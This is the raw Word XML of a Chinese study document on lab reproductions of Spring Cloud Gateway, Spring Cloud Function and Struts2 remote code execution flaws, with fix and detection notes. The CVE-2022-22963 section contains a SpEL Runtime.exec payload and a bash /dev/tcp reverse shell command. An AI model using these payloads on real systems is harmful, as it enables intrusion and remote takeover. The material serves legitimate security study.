          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gateway</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入漏洞(CVE-2022-22947)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7970E97E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①漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA737E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A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Spring Cloud Gateway提供了一个用于在Spring WebFlux上构建API Gateway的库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED9831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低版本Spring框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>启用和暴露Gateway Actuator端点时，使用Spring Cloud Gateway的应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F46D8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用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求，从而远程执行任意代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071B0387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②漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326314F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打开vulhub上对应的漏洞容器：启动Spring Cloud Gateway服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E27B65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查看端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：docker-compose ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748B48C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查看IP地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73C8F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访问网址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF1A171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63EA03D9" wp14:editId="23A2955E">
            <wp:extent cx="5969000" cy="1697355"/>
            <wp:effectExtent l="0" t="0" r="5080" b="9525"/>
            <wp:docPr id="12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图片 9"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>
                    <a:srcRect b="1244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B539B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4D5315D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抓取网站数据包，替换为vulhub网站上给的指定数据包，这里一步一步分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077972E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首先，修改GET /actuator请求，确定actuator端口已经开启</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59392529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2F490274" wp14:editId="1EEFE4AC">
            <wp:extent cx="5684520" cy="1882140"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="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86A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修改get请求，获取路由信息GET /actuator/gateway/routes/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F61E96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当前只有路由index,该路有默认跳转到uri:http://example.com:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43A608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74246DBA" wp14:editId="34927135">
            <wp:extent cx="5745480" cy="1813560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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36B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最后构造post请求包，POST /actuator/gateway/routes/hackest </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50814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添加一个包含恶意SpEL表达式的路由：记得替换IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7BDA6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在vulhub网站上有给指定数据包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737787CC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710DC2D0" wp14:editId="37F7871F">
            <wp:extent cx="5722620" cy="2339340"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="7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952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发送新的数据包刷新网关：vulhub上有指定数据包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E385FC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2E0776EC" wp14:editId="6F69FA39">
            <wp:extent cx="6476365" cy="1712595"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="7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4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CA5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检索结果：数据包还是在Vuihub上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A7BD7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4FB14947" wp14:editId="5F550A46">
            <wp:extent cx="5969000" cy="1306195"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="129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图片 17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DA3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发送 DELETE 请求以删除邪恶路由器：数据包还是在Vuihub上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07988A02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5C780555" wp14:editId="037168EC">
            <wp:extent cx="5972810" cy="1320800"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
            <wp:docPr id="129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" name="图片 19"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101"/>
                    <a:srcRect b="800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1A1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最后在刷新网关：数据包还是在Vuihub上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663D8487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③原理分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61121F8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根据上面的演示，我们会产生这样的一个问题，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为什么添加过滤器（路由）会导致代码执行？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4FC7B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我们一步步进行分析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ADC39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我们在vulhub里面开启了actuator功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3591A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上面第一步我们也检测了actuator端口是否打开。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2522BCE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打开后就可以利用此接口，如用/actuator/gateway/routes列出路由，里面就有默认的路由器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5714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然后通过/gateway/routes/{id_route_to_create}来添加一个路由。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6E98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再通过/actuator/gateway/refresh刷新路由。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA109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当路由带有恶意的Filter，里面的spEL表达式就会被执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5AAF24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30D2CD73" wp14:editId="22207298">
            <wp:extent cx="6477000" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7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5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ECD2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④漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3172E79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升级Spring Cloud Gateway版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C5C2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若无需Gateway actuator endpoint可通过management.endpoint.gateway.enabled:false禁用它。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D765FB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42704206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67A1B2F9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  <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Spring Cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Function SePL远程代码执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（CVE-2022-22963）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415BEFA5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color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>SpringCould简介：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F056A13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808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程，在视频转码、音视频转换、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC352A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808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19461B3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808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>专注于自身业务逻辑实现即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190062C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①漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4987FE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在Spring Cloud Function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>早期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本中，使用路由功能时，用户可以提供特制的SpEL作为路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F31C7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由表达式，这可能导致远程执行代码和访问本地资源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7197474F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影响版本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5397923E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3.0.0.RELEASE &lt;= Spring Cloud Function &lt;= 3.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D227C4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②漏洞复现之反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C82D7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打开vulhub上对应的漏洞容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4436AA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访问靶场环境（是一个报错页面）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F1F950" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="0" w:lineRule="atLeast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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="51D90570" wp14:editId="0DB279D3">
            <wp:extent cx="6479540" cy="1633855"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12065"/>
            <wp:docPr id="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65EF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访问此报错页面抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4CDB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改数据包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E75C07A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修改请求方式：POST /functionRouter HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7665C29D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添加请求体内容：spring.cloud.function.routing-expression: T(java.lang.Runtime)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E7E703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.getRuntime().exec("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>反弹shell指令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3396402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反弹shell指令：bash -c {echo,xxx}|{base64,-d}|{bash,-i}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628A8E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xxx为反弹shell指令：bash -i &gt;&amp; /dev/tcp/192.168.16.129/1234 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4ACB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反弹shell指令base64加密：如下图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC2B98D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12F848DB" wp14:editId="5A0FABAF">
            <wp:extent cx="4071620" cy="2665730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:srcRect t="1700" b="4422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5449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反弹shell成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E354F82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263A4645" wp14:editId="24A69BE9">
            <wp:extent cx="5295900" cy="1615440"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="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3BB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也可发送vulhub上指定数据包来创建success文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E56CCBE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③流量请求特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F96DE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可以看到POST /functionRouter HTTP/1.1以及如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F987A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spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D560D1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26B80121" wp14:editId="7C100D66">
            <wp:extent cx="6479540" cy="2181860"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="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FFB47" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0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四、Struts2框架漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6587CC53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4.1structs2框架特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B67DD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/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检查URL后缀：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6505A9D1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URL会以.do或.action结尾。注意Spring Web MVC等框架也可以用这样的后缀定义接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550B08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有很多网站都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开发，比如顺丰快递、土豆、德邦快递、蒙牛管理平台等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23914A0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00FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>示例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/s2/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>showcase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D24C69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4.2 区分structs2框架和Spring MVC框架</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA056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/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>测试特定参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563E0F2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URL中追加actionErrors参数。如果是Struts2开发，并且存在错误处理配置，可能会触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8BAD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一个错误响应，而Spring MVC通常不会因为这个参数而产生错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06858CC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/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>观察URL访问行为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C755AC5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对于S2应用，访问user.do/和user.do可能会产生不同的结果，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D281A2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0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>而在Spring MVC中，两者访问结果可能相同。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1680E553" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185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0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EA64BC" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185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0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60277A5A" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185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0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658DCAC6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sz w:val="18"/>
          <w:szCs w:val="1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lastRenderedPageBreak/>
        <w:t>4.3S2-045远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA90658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①S2-045原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E650D7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S2 默认用OGNL表达式处理用户输入，可以构造恶意OGNL表达式，导致服务器执行任意Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2BAF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代码，引发远程代码执行（RCE）攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A7D4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808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>原理详解：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>S2使用OGNL表达式处理view层数据字符串到 controller层的转换，即将输入的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF3E7F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808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字符串转换成Java对象。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>恶意OGNL表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，会导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>远程代码执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11163E1B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②漏洞检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5949C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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>手工检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05704B7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1、首先做信息收集，确定网站是 struts2 开发的站点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AA9A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2、随便上传文件抓包，把payload替换到content-type上（payload里加入一些数学计算）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A6A3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4、看到响应数据的响应头出现计算结果，证明这有漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3468B87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5、漏洞利用：可以嵌入可执行程序来进行攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078640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6、或者用特殊payload替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>content-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>内容获取用户信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A3058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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>工具检测：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1754A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用k8工具进行探测，目前只能利用低版本漏洞。可以获取用户信息、物理路径、版本信息等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C181B6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直接在工具输入目标URL后——获取信息、执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E04537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color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用Struts2漏洞检查工具2018版，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>直接将网站首页路径给工具，检测是否存在漏洞，还可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCC200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通过工具进行各种利用，进行命令执行、文件上传等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF68117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③S2-045漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC33E9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1、访问此站点，手工抓包或用工具检测漏洞是否存在，主要是根据响应结果来判断。  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76464FD9" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="100" w:firstLine="24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手工的方式：抓包修改数据包，添加攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
